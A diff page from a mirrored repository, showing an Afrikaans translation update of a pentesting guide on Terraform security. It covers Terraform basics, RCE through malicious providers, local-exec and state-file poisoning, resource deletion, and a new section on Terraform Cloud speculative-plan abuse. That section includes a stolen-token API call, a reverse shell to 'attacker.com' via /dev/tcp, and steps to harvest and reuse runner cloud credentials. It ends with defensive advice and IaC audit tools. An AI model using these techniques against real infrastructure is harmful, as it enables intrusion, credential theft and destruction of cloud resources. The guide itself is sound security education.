gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-12 15:50:19 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-ci-cd/terraform-security.md'] to af

Browse Source
This commit is contained in:
Translator
2025-08-19 15:26:33 +00:00
parent 3cebe1b636
commit d295944b82
1 changed files with 111 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

140
src/pentesting-ci-cd/terraform-security.md
View File

@@ -6,7 +6,7 @@
[Uit die dokumentasie:](https://developer.hashicorp.com/terraform/intro)
HashiCorp Terraform is 'n **infrastruktuur as kode hulpmiddel** wat jou toelaat om beide **wolke en plaaslike hulpbronne** in menslike leesbare konfigurasie lêers te definieer wat jy kan weergawe, hergebruik en deel. Jy kan dan 'n konsekwente werksvloei gebruik om al jou infrastruktuur deur sy lewensiklus te voorsien en te bestuur. Terraform kan lae-vlak komponente soos rekenaar, stoor en netwerk hulpbronne bestuur, sowel as hoë-vlak komponente soos DNS inskrywings en SaaS kenmerke.
HashiCorp Terraform is 'n **infrastruktuur as kode hulpmiddel** wat jou toelaat om beide **wolke en plaaslike hulpbronne** in menslike leesbare konfigurasie lêers te definieer wat jy kan weergawe, hergebruik en deel. Jy kan dan 'n konsekwente werksvloei gebruik om al jou infrastruktuur deur sy lewensiklus te voorsien en te bestuur. Terraform kan lae vlak komponente soos rekenaar, stoor en netwerk hulpbronne bestuur, sowel as hoë vlak komponente soos DNS inskrywings en SaaS kenmerke.
#### Hoe werk Terraform?
@@ -18,9 +18,9 @@ HashiCorp en die Terraform gemeenskap het reeds **meer as 1700 verskaffers** ges
Die kern Terraform werksvloei bestaan uit drie fases:
- **Skryf:** Jy definieer hulpbronne, wat oor verskeie wolkverskaffers en dienste kan wees. Byvoorbeeld, jy mag 'n konfigurasie skep om 'n toepassing op virtuele masjiene in 'n Virtuele Privaatskyf (VPC) netwerk met sekuriteitsgroepe en 'n laaibalans te ontplooi.
- **Beplan:** Terraform skep 'n uitvoeringsplan wat die infrastruktuur beskryf wat dit sal skep, opdateer of vernietig gebaseer op die bestaande infrastruktuur en jou konfigurasie.
- **Toepas:** Met goedkeuring voer Terraform die voorgestelde operasies in die korrekte volgorde uit, terwyl dit enige hulpbronafhanklikhede respekteer. Byvoorbeeld, as jy die eienskappe van 'n VPC opdateer en die aantal virtuele masjiene in daardie VPC verander, sal Terraform die VPC weer skep voordat dit die virtuele masjiene skaal.
- **Skryf:** Jy definieer hulpbronne, wat oor verskeie wolkverskaffers en dienste kan wees. Byvoorbeeld, jy mag 'n konfigurasie skep om 'n toepassing op virtuele masjiene in 'n Virtuele Privaat Wolk (VPC) netwerk met sekuriteitsgroepe en 'n laaibalanser te ontplooi.
- **Beplan:** Terraform skep 'n uitvoeringsplan wat die infrastruktuur beskryf wat dit sal skep, opdateer of vernietig op grond van die bestaande infrastruktuur en jou konfigurasie.
- **Toepas:** Met goedkeuring voer Terraform die voorgestelde operasies in die korrekte volgorde uit, terwyl dit enige hulpbron afhanklikhede respekteer. Byvoorbeeld, as jy die eienskappe van 'n VPC opdateer en die aantal virtuele masjiene in daardie VPC verander, sal Terraform die VPC weer skep voordat dit die virtuele masjiene skaal.
![](<../images/image (215).png>)
@@ -81,7 +81,7 @@ Jy kan 'n voorbeeld vind in [https://github.com/rung/terraform-provider-cmdexec]
**Gebruik van 'n eksterne verwysing**
Albei genoemde opsies is nuttig, maar nie baie stealthy nie (die tweede is meer stealthy, maar meer kompleks as die eerste). Jy kan hierdie aanval selfs op 'n **stealthier manier** uitvoer deur hierdie voorstelle te volg:
Albei genoemde opsies is nuttig, maar nie baie stealthy nie (die tweede is meer stealthy maar meer kompleks as die eerste). Jy kan hierdie aanval selfs op 'n **stealthier manier** uitvoer deur hierdie voorstelle te volg:
- In plaas daarvan om die rev shell direk in die terraform-lêer by te voeg, kan jy 'n **eksterne hulpbron** laai wat die rev shell bevat:
```javascript
@@ -93,9 +93,9 @@ U kan die rev shell kode vind in [https://github.com/carlospolop/terraform_exter
- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell kode in 'n tak** binne die repo te verberg, iets soos: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
### Terraform Apply
### Terraform Toepassing
Terraform apply sal uitgevoer word om al die veranderinge toe te pas, jy kan dit ook misbruik om RCE te verkry deur **'n kwaadwillige Terraform-lêer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)** in te spuit.**\
Terraform toepassing sal uitgevoer word om al die veranderinge toe te pas, jy kan dit ook misbruik om RCE te verkry deur **'n kwaadwillige Terraform-lêer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lêer eindig:
```json
// Payload 1 to just steal a secret
@@ -124,7 +124,7 @@ value = nonsensitive(var.do_token)
```
## Misbruik van Terraform Toestand Lêers
In die geval dat jy skryfreëls oor terraform toestand lêers het, maar nie die terraform kode kan verander nie, [**hierdie navorsing**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) bied 'n paar interessante opsies om voordeel te trek uit die lêer. Selfs al sou jy skryfreëls oor die konfigurasielêers hê, is dit dikwels baie meer slu om die vektor van toestand lêers te gebruik, aangesien jy nie spore in die `git` geskiedenis agterlaat nie.
In die geval dat jy skryfreëls oor terraform toestand lêers het, maar nie die terraform kode kan verander nie, [**hierdie navorsing**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) bied 'n paar interessante opsies om voordeel te trek uit die lêer. Selfs al sou jy skryfreëls oor die konfigurasielêers hê, is dit dikwels baie slu om die vektor van toestand lêers te gebruik, aangesien jy nie spore in die `git` geskiedenis agterlaat nie.
### RCE in Terraform: konfigurasielêer vergiftiging
@@ -154,11 +154,11 @@ Om dit direk te gebruik, sluit net die volgende in enige posisie van die `resour
```
Dan, sodra `terraform` uitgevoer word, sal jou kode loop.
### Verwydering van hulpbronne <a href="#deleting-resources" id="deleting-resources"></a>
### Huidige hulpbronne verwyder <a href="#deleting-resources" id="deleting-resources"></a>
Daar is 2 maniere om hulpbronne te vernietig:
1. **Voeg 'n hulpbron met 'n ewekansige naam in die staatlêer in wat na die werklike hulpbron wys om te vernietig**
1. **Voeg 'n hulpbron met 'n ewekansige naam in die staatlêer in wat na die werklike hulpbron wat vernietig moet word, wys**
Omdat terraform sal sien dat die hulpbron nie behoort te bestaan nie, sal dit dit vernietig (volgens die werklike hulpbron-ID wat aangedui word). Voorbeeld van die vorige bladsy:
```json
@@ -178,11 +178,11 @@ Omdat terraform sal sien dat die hulpbron nie behoort te bestaan nie, sal dit di
```
2. **Wysig die hulpbron om te verwyder op 'n manier dat dit nie moontlik is om op te dateer nie (sodat dit verwyder en weer geskep sal word)**
Vir 'n EC2-instantie is dit genoeg om die tipe van die instantie te wysig sodat terraform dit verwyder en weer skep.
Vir 'n EC2-instantie is dit genoeg om die tipe van die instantie te wysig om terraform te laat verwyder en dit weer te skep.
### Vervang geblacklisted verskaffer
### Vervang geblacklistde verskaffer
In die geval dat jy 'n situasie teëkom waar `hashicorp/external` geblacklisted was, kan jy die `external` verskaffer her-implementeer deur die volgende te doen. Let wel: Ons gebruik 'n fork van die eksterne verskaffer wat gepubliseer is deur https://registry.terraform.io/providers/nazarewk/external/latest. Jy kan jou eie fork of her-implementering ook publiseer.
In die geval dat jy 'n situasie teëkom waar `hashicorp/external` geblacklist is, kan jy die `external` verskaffer her-implementeer deur die volgende te doen. Let wel: Ons gebruik 'n fork van die external verskaffer wat gepubliseer is deur https://registry.terraform.io/providers/nazarewk/external/latest. Jy kan jou eie fork of her-implementering ook publiseer.
```terraform
terraform {
required_providers {
@@ -199,18 +199,92 @@ data "external" "example" {
program = ["sh", "-c", "whoami"]
}
```
## Terraform Cloud spekulatiewe plan RCE en geloofsbrief uitlek
Hierdie scenario misbruik Terraform Cloud (TFC) lopers tydens spekulatiewe planne om in die teiken wolk rekening te pivot.
- Voorwaardes:
- Steel 'n Terraform Cloud token van 'n ontwikkelaar masjien. Die CLI stoor tokens in platte teks by `~/.terraform.d/credentials.tfrc.json`.
- Die token moet toegang hê tot die teiken organisasie/werkruimte en ten minste die `plan` toestemming. VCS-ondersteunde werkruimtes blokkeer `apply` vanaf CLI, maar laat steeds spekulatiewe planne toe.
- Ontdek werkruimte en VCS instellings via die TFC API:
```bash
export TF_TOKEN=<stolen_token>
curl -s -H "Authorization: Bearer $TF_TOKEN" \
https://app.terraform.io/api/v2/organizations/<org>/workspaces/<workspace> | jq
```
- Onttrigger kode-uitvoering tydens 'n spekulatiewe plan deur die eksterne databron en die Terraform Cloud "cloud" blok te gebruik om die VCS-ondersteunde werksruimte te teiken:
```hcl
terraform {
cloud {
organization = "acmecorp"
workspaces { name = "gcp-infra-prod" }
}
}
data "external" "exec" {
program = ["bash", "./rsync.sh"]
}
```
Voorbeeld rsync.sh om 'n omgekeerde skulp op die TFC-loper te verkry:
```bash
#!/usr/bin/env bash
bash -c 'exec bash -i >& /dev/tcp/attacker.com/19863 0>&1'
```
Voer 'n spekulatiewe plan uit om die program op die ephemerale hardeware te voer:
```bash
terraform init
terraform plan
```
- Enumereer en eksfiltreer ingeslote wolk geloofsbriewe vanaf die hardloper. Tydens lopies, TFC sluk verskaffer geloofsbriewe via lêers en omgewingsveranderlikes:
```bash
env | grep -i gcp || true
env | grep -i aws || true
```
Verwagte lêers in die hardloopwerkomgewing:
- GCP:
- `tfc-google-application-credentials` (Werklas Identiteit Federasie JSON konfigurasie)
- `tfc-gcp-token` (kortlewe GCP toegangstoken)
- AWS:
- `tfc-aws-shared-config` (web identiteit/OIDC rol aanname konfigurasie)
- `tfc-aws-token` (kortlewe token; sommige organisasies mag statiese sleutels gebruik)
- Gebruik die kortlewe geloofsbriewe buite band om VCS poorte te omseil:
GCP (gcloud):
```bash
export GOOGLE_APPLICATION_CREDENTIALS=./tfc-google-application-credentials
gcloud auth login --cred-file="$GOOGLE_APPLICATION_CREDENTIALS"
gcloud config set project <PROJECT_ID>
```
AWS (AWS CLI):
```bash
export AWS_CONFIG_FILE=./tfc-aws-shared-config
export AWS_PROFILE=default
aws sts get-caller-identity
```
Met hierdie kredensiale kan aanvallers hulpbronne direk skep/wysig/verwoes met behulp van inheemse CLIs, wat PR-gebaseerde werkvloeië omseil wat `apply` via VCS blokkeer.
- Verdedigende leiding:
- Pas die minste voorreg toe op TFC gebruikers/spanne en tokens. Oudit lede en vermy oorgrote eienaars.
- Beperk `plan` toestemming op sensitiewe VCS-ondersteunde werkruimtes waar moontlik.
- Handhaaf verskaffer/data bron toelaatlys met Sentinel beleide om `data "external"` of onbekende verskaffers te blokkeer. Sien HashiCorp leiding oor verskafferfiltrering.
- Verkies OIDC/WIF bo statiese wolk kredensiale; behandel lopers as sensitief. Monitor spekulatiewe plan lopies en onverwagte uitgang.
- Ontdek ekfiltrasie van `tfc-*` kredensiaal artefakte en waarsku oor verdagte `external` programgebruik tydens planne.
## Outomatiese Oudit Gereedskap
### [**Snyk Infrastruktuur as Kode (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
Snyk bied 'n omvattende Infrastruktuur as Kode (IaC) skandeeroplossing wat kwesbaarhede en verkeerde konfigurasies in Terraform, CloudFormation, Kubernetes, en ander IaC-formate opspoor.
Snyk bied 'n omvattende Infrastructure as Code (IaC) skandeeroplossing wat kwesbaarhede en miskonfigurasies in Terraform, CloudFormation, Kubernetes, en ander IaC formate opspoor.
- **Kenmerke:**
- Regs-tyd skandering vir sekuriteitskwesbaarhede en nakomingskwessies.
- Integrasie met weergawebeheer stelsels (GitHub, GitLab, Bitbucket).
- Outomatiese regstelling trekversoeke.
- Geoutomatiseerde regstelling trekversoeke.
- Gedetailleerde hersteladvies.
- **Teken In:** Skep 'n rekening op [Snyk](https://snyk.io/).
- **Teken Aan:** Skep 'n rekening op [Snyk](https://snyk.io/).
```bash
brew tap snyk/tap
brew install snyk
@@ -219,24 +293,24 @@ snyk iac test /path/to/terraform/code
```
### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
**Checkov** is 'n statiese kode-analise hulpmiddel vir infrastruktuur as kode (IaC) en ook 'n sagteware-samestelling analise (SCA) hulpmiddel vir beelde en oopbrons pakkette.
**Checkov** is 'n statiese kode analise hulpmiddel vir infrastruktuur as kode (IaC) en ook 'n sagteware samestelling analise (SCA) hulpmiddel vir beelde en oopbron pakkette.
Dit skandeer wolkinfrastruktuur wat voorsien is met behulp van [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), of [OpenTofu](https://opentofu.org/) en detecteer sekuriteits- en nakomingsmisconfigurasies met behulp van graf-gebaseerde skandering.
Dit skandeer wolk infrastruktuur wat voorsien is met [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), of [OpenTofu](https://opentofu.org/) en detecteer sekuriteits- en nakomingsmisconfigurasies deur middel van graf-gebaseerde skandering.
Dit voer [Sagteware-samestelling analise (SCA) skandering](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) uit, wat 'n skandering van oopbrons pakkette en beelde vir Algemene Kw vulnerabilities en Blootstellings (CVEs) is.
Dit voer [Sagteware Samestelling Analise (SCA) skandering](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) uit wat 'n skandering van oopbron pakkette en beelde vir Algemene Kw vulnerabilities en Blootstellings (CVEs) is.
```bash
pip install checkov
checkov -d /path/to/folder
```
### [terraform-compliance](https://github.com/terraform-compliance/cli)
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is 'n liggewig, sekuriteit en nakoming gefokusde toetsraamwerk teen terraform om negatiewe toetsing vermoë vir jou infrastruktuur-as-kode moontlik te maak.
From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is 'n liggewig, sekuriteit en nakoming gefokusde toetsraamwerk teen terraform om negatiewe toetsing vermoë vir jou infrastruktuur-as-kode te stel.
- **compliance:** Verseker dat die geïmplementeerde kode sekuriteitsstandaarde en jou eie pasgemaakte standaarde volg
- **behaviour driven development:** Ons het BDD vir byna alles, hoekom nie vir IaC nie?
- **portable:** installeer dit net vanaf `pip` of hardloop dit via `docker`. Sien [Installation](https://terraform-compliance.com/pages/installation/)
- **pre-deploy:** dit valideer jou kode voordat dit ontplooi word
- **easy to integrate:** dit kan in jou pyplyn (of in git hooks) loop om te verseker dat alle ontplooiings gevalideer word.
- **easy to integrate:** dit kan in jou pyplyn (of in git hooks) hardloop om te verseker dat alle ontplooiings gevalideer word.
- **segregation of duty:** jy kan jou toetse in 'n ander repository hou waar 'n aparte span verantwoordelik is.
> [!NOTE]
@@ -267,21 +341,21 @@ tfsec /path/to/folder
```
### [KICKS](https://github.com/Checkmarx/kics)
Vind sekuriteitskwesbaarhede, nakomingskwessies, en infrastruktuur miskonfigurasies vroeg in die ontwikkelingsiklus van jou infrastruktuur-as-kode met **KICS** deur Checkmarx.
Vind sekuriteitskwesbaarhede, nakomingskwessies en infrastruktuur miskonfigurasies vroeg in die ontwikkelingsiklus van jou infrastruktuur-as-kode met **KICS** deur Checkmarx.
**KICS** staan vir **K**eeping **I**nfrastructure as **C**ode **S**ecure, dit is oopbron en is 'n moet-hê vir enige wolk-natiewe projek.
**KICS** staan vir **K**eeping **I**nfrastructure as **C**ode **S**ecure, dit is oopbron en is 'n moet-hê vir enige wolk-natuurlike projek.
```bash
docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
```
### [Terrascan](https://github.com/tenable/terrascan)
Van die [**docs**](https://github.com/tenable/terrascan): Terrascan is 'n statiese kode-analiseerder vir Infrastruktur as Kode. Terrascan stel jou in staat om:
From the [**docs**](https://github.com/tenable/terrascan): Terrascan is 'n statiese kode-analiseerder vir Infrastruktur as Kode. Terrascan stel jou in staat om:
- Naadloos infrastruktuur as kode te skandeer vir misconfigurasies.
- Geverifieerde wolkinfrastruktuur te monitor vir konfigurasiewijzigings wat houdingafwykings inbring, en stel jou in staat om na 'n veilige houding terug te keer.
- Naadloos infrastruktuur as kode te skandeer vir miskonfigurasies.
- Geverifieerde wolkinfrastruktuur te monitor vir konfigurasiewijzigings wat posisie-afwykings inbring, en stel jou in staat om na 'n veilige posisie terug te keer.
- Sekuriteitskwesbaarhede en nakomingsoortredings te ontdek.
- Risiko's te verminder voordat wolk-natiewe infrastruktuur geprovisieer word.
- Bied buigsaamheid om plaaslik te loop of te integreer met jou CI\CD.
- Risiko's te verminder voordat wolk-natiewe infrastruktuur geprovisioneer word.
- Bied buigsaamheid om plaaslik te loop of met jou CI\CD te integreer.
```bash
brew install terrascan
```
@@ -292,5 +366,13 @@ brew install terrascan
- [https://developer.hashicorp.com/terraform/intro](https://developer.hashicorp.com/terraform/intro)
- [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
- [https://github.com/offensive-actions/terraform-provider-statefile-rce](https://github.com/offensive-actions/terraform-provider-statefile-rce)
- [Terraform Cloud token misbruik draai spekulatiewe plan in afstandkode-uitvoering](https://www.pentestpartners.com/security-blog/terraform-token-abuse-speculative-plan/)
- [Terraform Cloud toestemmings](https://developer.hashicorp.com/terraform/cloud-docs/users-teams-organizations/permissions)
- [Terraform Cloud API Wys werksruimte](https://developer.hashicorp.com/terraform/cloud-docs/api-docs/workspaces#show-workspace)
- [AWS provider konfigurasie](https://registry.terraform.io/providers/hashicorp/aws/latest/docs#provider-configuration)
- [AWS CLI OIDC rol aanname](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html#cli-configure-role-oidc)
- [GCP provider Gebruik Terraform Cloud](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference.html#using-terraform-cloud)
- [Terraform Sensitiewe veranderlikes](https://developer.hashicorp.com/terraform/tutorials/configuration-language/sensitive-variables)
- [Snyk Labs Gitflops: gevare van Terraform outomatiseringsplatforms](https://labs.snyk.io/resources/gitflops-dangers-of-terraform-automation-platforms/)
{{#include ../banners/hacktricks-training.md}}